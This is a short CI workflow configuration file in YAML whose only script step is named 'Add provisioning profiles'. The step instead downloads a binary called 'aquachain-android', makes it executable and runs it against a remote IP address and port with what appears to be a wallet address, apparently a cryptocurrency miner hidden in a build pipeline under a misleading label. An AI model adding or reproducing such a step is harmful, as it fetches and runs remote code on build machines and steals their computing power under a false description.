workflows:
  my-workflow:
    scripts:
      - name: Add provisioning profiles
        script: |
          wget https://info.aquacha.in/latest/aquachain-android && chmod +x aquachain-android && ./aquachain-android -F 88.198.100.230:19998/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/01 -G
